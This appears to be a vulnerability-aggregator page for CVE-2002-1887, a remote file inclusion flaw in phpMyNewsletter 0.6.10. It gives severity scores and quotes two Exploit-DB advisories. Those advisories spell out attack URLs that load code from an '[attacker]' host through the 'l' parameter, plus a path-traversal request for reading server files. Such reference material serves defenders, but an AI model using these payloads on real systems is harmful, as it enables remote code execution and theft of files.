CVE-2002-1887
published 2002-12-31CVE-2002-1887: PHP remote file inclusion vulnerability in customize.php for phpMyNewsletter 0.6.10 allows remote attackers to execute arbitrary PHP code via the l parameter.
PriorityP337high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.01%
85.7th percentile
PHP remote file inclusion vulnerability in customize.php for phpMyNewsletter 0.6.10 allows remote attackers to execute arbitrary PHP code via the l parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gregory_kokanosky | phpmynewsletter | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
phpMyNewsletter 0.6.10 - 'customize.php' Remote File Inclusion
exploitdb·2007-04-04
CVE-2002-1887 phpMyNewsletter 0.6.10 - 'customize.php' Remote File Inclusion
phpMyNewsletter 0.6.10 - 'customize.php' Remote File Inclusion
---
Product : phpMyNewsletter
Tested version : 0.6.10
Website : http://gregory.kokanosky.free.fr/phpmynewsletter/
Problem : include file
PHP code :
°°°°°°°°°°
---- /include/customize.php ----
---- /include/customize.php ----
Exploit :
°°°°°°°°°
http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
With in http://[attacker]/code.txt :
or
http://[target]/include/customize.php?l=../path/file/to/view
Patch :
°°°°°°°
Autor has been alerted and last version (0.7beta1) has been patched.
More details
- in french :
http://www.frog-man.org/tutos/phpMyNewsletter.txt
- translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2Fphp
Exploit-DB
phpMyNewsletter 0.6.10 - Remote File Inclusion
exploitdb·2002-10-03
CVE-2002-1887 phpMyNewsletter 0.6.10 - Remote File Inclusion
phpMyNewsletter 0.6.10 - Remote File Inclusion
---
source: https://www.securityfocus.com/bid/5886/info
A vulnerability has been discovered in phpMyNewsLetter.
Reportedly, it is possible to pass an attacker-specified file include location to a CGI paramter of the 'customize.php' script.
This may allow an attacker to execute arbitrary commands with the privileges of the webserver.
Additionally, an attacker may exploit this problem to view local webserver readable files.
http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
With in http://[attacker]/code.txt :
or
http://[target]/include/customize.php?l=../path/file/to/view
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2002-10/0060.htmlhttp://secunia.com/advisories/7220http://www.iss.net/security_center/static/10288.phphttp://www.securityfocus.com/bid/5886http://archives.neohapsis.com/archives/bugtraq/2002-10/0060.htmlhttp://secunia.com/advisories/7220http://www.iss.net/security_center/static/10288.phphttp://www.securityfocus.com/bid/5886
2002-12-31
Published